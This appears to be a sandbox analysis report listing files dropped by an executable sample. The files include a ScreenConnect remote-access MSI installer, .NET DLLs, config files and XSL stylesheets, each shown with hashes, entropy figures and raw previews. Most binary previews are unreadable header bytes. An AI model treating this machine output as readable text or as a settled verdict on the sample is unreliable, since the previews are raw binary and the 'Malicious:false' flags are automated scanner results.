                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):228
                                                                Entropy (8bit):5.069688959232011
                                                                Encrypted:false
                                                                SSDEEP:6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
                                                                MD5:EB99EE012EB63C162EEBC1DF3A15990B
                                                                SHA1:D48FD3B3B942C754E3588D91920670C087FCE7E9
                                                                SHA-256:C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
                                                                SHA-512:455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
                                                                Malicious:false
                                                                Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):49152
                                                                Entropy (8bit):4.62694170304723
                                                                Encrypted:false
                                                                SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):36864
                                                                Entropy (8bit):4.340550904466943
                                                                Encrypted:false
                                                                SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):57344
                                                                Entropy (8bit):4.657268358041957
                                                                Encrypted:false
                                                                SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):176128
                                                                Entropy (8bit):5.775360792482692
                                                                Encrypted:false
                                                                SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):546304
                                                                Entropy (8bit):6.03286879586464
                                                                Encrypted:false
                                                                SSDEEP:6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
                                                                MD5:3B1BA4BEBEFDC8A95B0F2F0B4E50C527
                                                                SHA1:15551D2E8BFB829F3A96D161B43DE820C0D417CE
                                                                SHA-256:A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
                                                                SHA-512:F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):22016
                                                                Entropy (8bit):5.19884453207748
                                                                Encrypted:false
                                                                SSDEEP:384:SBHH+yElQjHVPioy4cDphaC/GeXczrMRbx1kjvdNU5yYoJ37dbr9DO:hrCtPcDCyXcMJ5yp7dbtO
                                                                MD5:9260AFE4BBDE2549FC0B92F657C2E50A
                                                                SHA1:5580778A62B06D7B56D3F788727514551DE31647
                                                                SHA-256:588D3A5E1B91D3756F74EA61C9C1B5F7871AF924FAB469CEBB579F8AEB2FC135
                                                                SHA-512:AFCE644EE04813E1E323B719E8AD3CFEFE6E20AD0AA821F1325B8E0AE0144A7CFF4E0F1F4B6F45DF33F060392F94BCFD88D62B2218FD0BC573D65A20D80E968B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zJ..........." ..0..N.........."m... ........... ....................................@..................................l..O................................... l..8............................................ ............... ..H............text...(M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................m......H........2...9...................k........................................(....*^.(......./...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..h.......s#......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~......"...s....%......(...+%-.&+.(.......$...s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1721344
                                                                Entropy (8bit):6.638160977312247
                                                                Encrypted:false
                                                                SSDEEP:24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
                                                                MD5:D196174CF03F86C8776E717F07D5D19F
                                                                SHA1:BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
                                                                SHA-256:A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
                                                                SHA-512:CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5358
                                                                Entropy (8bit):5.152842845836485
                                                                Encrypted:false
                                                                SSDEEP:48:6al5t7Bh14CGwFTwGqwFdwwA14XFUjF4OSMS5+ZL+FKwsiMS6g/VMS5JtD9FmoG6:6dQmN6MSzOE9FEFWFqFWcNH0eSYIZj
                                                                MD5:8BD7F5FAA7C10C7BD3DADF217622D3C5
                                                                SHA1:DEDA0F0C8521A9D6F94F76C528249504E0EE1FB9
                                                                SHA-256:378CA2D1E4663403C3C43F1A4928821D9E6CF10BE535C084A23FF5B54C3B72DD
                                                                SHA-512:0681765200BD3E5DFA81C0F2BBD156CFA70B91433DDA02F1DB0F440CB697E6399C3177B821CE62535003E9E3849D5B695E4DCAB6593CAFC70E673EEF99D2ACB5
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="2.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform" ...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...exclude-result-prefixes="msxsl"..>...<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*"/>....</xsl:copy>...</xsl:template>.....<xsl:variable name="EnableGuestRequireConsentToggle" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='EnableGuestRequireConsentToggle']" />...<xsl:variable name="SupportLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='SupportLockMachineOnDisconnect']" />...<xsl:variable name="AccessLockMachineOnDisconnect" select="configuration/ScreenConnect.UserInterfaceSettings/setting[@name='AccessLockMachineOnDisconnect']" />...<xsl:variable name="SupportLockMachine
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1135
                                                                Entropy (8bit):5.055198370362517
                                                                Encrypted:false
                                                                SSDEEP:24:3qae8NW+OOt69ta9DAa9DtPMwrDAiFGrZs1BEU/q5rM/+01j:3qae8NW6SubtzAiFGrZC+IYrRqj
                                                                MD5:7F75CED83D8C263A88A622A1E089B902
                                                                SHA1:4C14858C78B556A0D1A02D596F74059944AE7865
                                                                SHA-256:115937C6A57BFC17E1F9EA92C0C146DB44C803A449207FC77DD53CB0824DAA29
                                                                SHA-512:C813C1D990DDAFE9B1A441791870A7238673E9CBA25CC044A6679EC2707323E3B91AEC6DE7CC14E434297B10DC33987D3C1FD7FDB2F742370F272C80FC01DA4C
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" exclude-result-prefixes="msxsl">..<xsl:output method="xml" omit-xml-declaration="yes"/>...<xsl:template match="/root">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />.....<xsl:if test="count(data[@name='ApplicationDirectoryName']) = 0 and count(data[@name='ApplicationTitle']) &gt; 0" xml:space="preserve"> <data name="ApplicationDirectoryName" xml:space="preserve">.. <value><xsl:value-of select="data[@name='ApplicationTitle']/value" /></value>.. </data>..</xsl:if>....</xsl:copy>...</xsl:template>...<xsl:template match="/root//node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>... this should be handled with the updated xsl which accounts for missing input files -->... we originally took this out because the Xsl.exe was updated to handle missing files but it seems like we still need t
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1768
                                                                Entropy (8bit):5.101132156143849
                                                                Encrypted:false
                                                                SSDEEP:48:3qagl80iEFFrbb2FbZb0FbfeAPd5p+3FsJvP95vJ2rFuFnrRPOQR:aji3ALemVP95vH9
                                                                MD5:258C82001204536C091D6ABF60724339
                                                                SHA1:1C71A8427C60C962D655AD5199F1D68A049EE549
                                                                SHA-256:C7EA7315ED86E55D841CE665C02D119D1F054F810BE7EE346A268E10F5826957
                                                                SHA-512:3A6187B53319D096915CAACE9D65F9D40CA04EB274849D8EB4C934FF709CD02E3912C6D22AE5695B9B25FD23C86D13C1B61BD39DCBCD0AF397988AF0393CA9D6
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:ScreenConnect" exclude-result-prefixes="msxsl user">...<xsl:param name="licenseSignatureKey" />...<xsl:param name="licenseID" />.....<msxsl:script language="C#" implements-prefix="user" xml:space="preserve">....<msxsl:assembly name="System.Configuration" />....<msxsl:assembly name="ScreenConnect.Windows" />....<msxsl:assembly name="ScreenConnect.Server" />....<msxsl:assembly name="ScreenConnect.Core" />....<msxsl:using namespace="ScreenConnect" />....<msxsl:using namespace="System.IO" />....<msxsl:using namespace="System.Xml.Serialization" />....<msxsl:using namespace="System.Text" />........public string GenerateLicenseXml(string licenseSignatureKey, string licenseID)....{.....var license = new CloudLicense { LicenseID = licenseID };.......var envelope = new LicenseEnvelope { Contents = license };.....envelope.Sign(Convert.FromBase64String(lice
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):629
                                                                Entropy (8bit):5.130173870130788
                                                                Encrypted:false
                                                                SSDEEP:12:yhkVRoUFLjco4IMs/XCZsDJMtR99oRXbHmiioRXbHmiHIfISdXt:KKer7n9AHvHjSXv
                                                                MD5:31908D4B70E384C9F4D42CB05A28A73C
                                                                SHA1:7A69055E9EB8E482C009F12CF5E555585531663B
                                                                SHA-256:3D8138FDD91F148DE65DC062A9A4BD9781449B5D8C526157C61A04BFD86255F2
                                                                SHA-512:ED993EB8848E144085D9335D82CBC6DFE940F6649C972EC173883486899186E94EF69992457A221B37F9BE3934B629EE7F7965C2D7C671B97DB210AC060FD589
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">...<xsl:param name="baseFilePath" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="/root/data">....<xsl:if test="count(document($baseFilePath)/root/data[@name = current()/@name]) != 0 and document($baseFilePath)/root/data[@name = current()/@name]/value != current()/value">.....<xsl:copy>......<xsl:apply-templates select="node()|@*" />.....</xsl:copy>....</xsl:if>...</xsl:template>..</xsl:stylesheet>..
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5837
                                                                Entropy (8bit):5.223683802415461
                                                                Encrypted:false
                                                                SSDEEP:48:3RW/8dr71427K9y+mXrlREtoO8gSs0e2tx4u/h0MrlGEsoi3itx4u/h0frlyEBFC:hWW0wtGtUpe2nhbjsvynhaHBGnhMBbZY
                                                                MD5:144ADC93F53E457A1BFFA5372FD3C09B
                                                                SHA1:6B19BB56C3C2F6E761D16D42112B57BD5E50D49E
                                                                SHA-256:D467FE93A43F887F3F5440F9C9B9C66739DF8C064FA6A467AA102123EEDBEB4B
                                                                SHA-512:08CA5D41C46CCD09F7FDE4EE325A38F0AE215AD9003CC9F0AF2B70AD59AC0A9995217EAC6A749E0BCFCE24AA23C0F106A42F6C4D1D367FD82429BCE4468B7487
                                                                Malicious:false
                                                                Preview:.<xsl:stylesheet.version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="*[not(text()) and not(*)]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>.....<xsl:template match="PermissionEntry[@OwnershipFilter!='OwnedAndUnowned' and @AccessControlType!='Deny']" />.....<xsl:template match="@xsi:type[.='SessionOwnershipPermissionEntry']">....<xsl:attribute name="xsi:type">SessionPermissionEntry</xsl:attribute>...</xsl:template>.....<xsl:template match="@OwnershipFilter" />.....<xsl:template match="@Name[.='EndSession']">....<xsl:attribute name="Name">DeleteSession</xs
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):741
                                                                Entropy (8bit):5.169072715134804
                                                                Encrypted:false
                                                                SSDEEP:12:yJ6Va8io1rO4ej+QhFLjco4IMs/XCZFr5CyWi7s/XCZDSbn:xa8ZrO4ej+4er7ftC127N8n
                                                                MD5:41DFF6114A921D7AC5637B8AC9F04DC4
                                                                SHA1:03880D70FA6A268C040025E90BC767D572BA36A0
                                                                SHA-256:2CEFD9DB01C7A6F8E33A7DADBF511E963E56FF87D18064BAB2E4FE2D00A95797
                                                                SHA-512:FE12502B10B35EF09837A8DE8CC1D7A0A67AAFBEBAF2E6911302D3E4C2F0379DFFF41B476ECBED04F24083F4B80C779F6CD19CB69633C0D6C8A3CE27ABD78958
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for self-closing tags -->...<xsl:template match="*[not(text()) and not(*)]">....<xsl:copy>.....<xsl:apply-templates select="@*" />....</xsl:copy>...</xsl:template>..... no actual transforms for now -->....</xsl:stylesheet>..
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with very long lines (14704), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):165735
                                                                Entropy (8bit):4.0957845053651
                                                                Encrypted:false
                                                                SSDEEP:768:+aOZY/q3nv4eEPg8YFNHo9GHVIO35EiOGielK2pY/q3nv4eEPg8YFNHo9GHVI+3F:+aJ/CnQehCGHVt43/CnQehCGHVf1
                                                                MD5:4D5B6FB68883C7842D5397D54E85ABC2
                                                                SHA1:02DC58F27E440F02B5FC4872083C7DAFD2DD98C0
                                                                SHA-256:6224B2FE77D2D9104E1BF79573CE1849C408744278DEEB198622FB28E46D80CE
                                                                SHA-512:9398B8A85DD3B22B0F48AB05B8C9FF34C0B087BF49DF82320D93D1D52D4E26533A0EFA1BF0696DE4052A33AF0BAC824CC8A1F5998EEB5D25E438F9E4110622EF
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />...<xsl:variable name="singleQuote">'</xsl:variable>.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />....<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1564
                                                                Entropy (8bit):5.254408929629647
                                                                Encrypted:false
                                                                SSDEEP:24:xa8gaRs7rO4ej+HLSEWucLxjUbNtBUU/Der7ftC127vwKwNwwkFEphRynS2n:E8gaRsTtogYq6r71427IbNxkFDSq
                                                                MD5:26E0BFF9194950526A0BA294210BAF79
                                                                SHA1:026D99742D35B1ECCB0DF29ECDA19CECE0387C88
                                                                SHA-256:248DCA9B0706E95A2CBE18B4959ECCA5DFA2D4A77AADC66BF7BA9734757EF29C
                                                                SHA-512:A3B29F916B29FE84DA5B4A9FB74BBCCB04781A0021C7C9EE4195D5D8024B9A5A7C64CDEF9AA98E10F1E68060E29E74677CD43002086FD76F3BAEB69B2147715B
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="oldVersionBuild" />.....<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Text.RegularExpressions" />..<![CDATA[......public static string RegexReplace(string input, string pattern, string replacement)....{.....return Regex.Replace(input, pattern, replacement);....}.... ...</msxsl:script>..... basic identity transform -->...<xsl:template match="node()|@*">....<xsl:copy>.....<xsl:apply-templates select="node()|@*" />....</xsl:copy>...</xsl:template>..... identity transform for sel
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:Algol 68 source, ASCII text, with very long lines (1649), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):42037
                                                                Entropy (8bit):5.478811092639316
                                                                Encrypted:false
                                                                SSDEEP:768:E1YNsh5xxCuEfxBDyp818n4SIOaUUX4bwsfVdfdFNvwDxjLVO88RlUEjKRMX9HPk:E1VCuEfxBDyp818n4SPaUUIbwsfVdfdA
                                                                MD5:3E2819DAE208FB16B35E83522C9E1E21
                                                                SHA1:325D9AB2122FF9B41AE936326CD23A0CBCCD16BE
                                                                SHA-256:6B93D87A6547CEDD4EE11EB7E9373963B89F98536A7F834D4564977306021554
                                                                SHA-512:6D5388F35C0958ACE0EAFDF8E98A3125D2535AC25670C0E13EED6664E9D97B6B2ED48889FD07CE9B74C0E8923C0BB796C537B0F4EB5C76A85B1E24474367ED6F
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:strip-space elements="add remove httpRuntime" />...<xsl:param name="configuration" />...<xsl:param name="platform" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="version" />...<xsl:param name="utcOffsetMinuteCount" />..... NOTE: this only supports C# 2.0 and .NET Framework 2.0-->... Custom/XslScratchpad is setup with the same C#/.NET configuration to provide full IDE support, so changes should be made/tested there and then copied to this section -->...<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Collections.Generic" />....<msxsl:using namespace="System.Security.Crypto
                                                                Process:C:\Users\user\Desktop\H36NgltNe7.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {7A085B4C-0189-0C8C-1652-69D0030FEB14}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                Category:dropped
                                                                Size (bytes):13860864
                                                                Entropy (8bit):7.969006296866273
                                                                Encrypted:false
                                                                SSDEEP:196608:7Zs6Uruc9XbZZs6UYZs6UnZs6UeZs6UvlZs6UvZZs6UvD:7nCtxbZntnEnxn4n2nI
                                                                MD5:46DBB0A30EB3321BF8A0B7B9E8FCF879
                                                                SHA1:E6C532449BA25746B3D5EA548EDCDE831F0F9EED
                                                                SHA-256:8228C46F8277086B960DB842417892BE28DB7ECA1350E019036D9AA92B0B7D5D
                                                                SHA-512:9DB150DE69464AB907EB3D6F6A18ADCF8A37A49BE79B81B15BF5BF03910EFDF05AC71BF21772A0838CCE701A3F8B4709581B451DBD44569CD961B7EA05BAEF6A
                                                                Malicious:false
                                                                Preview:......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {7A085B4C-0189-0C8C-1652-69D0030FEB14}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                Category:dropped
                                                                Size (bytes):13860864
                                                                Entropy (8bit):7.969006296866273
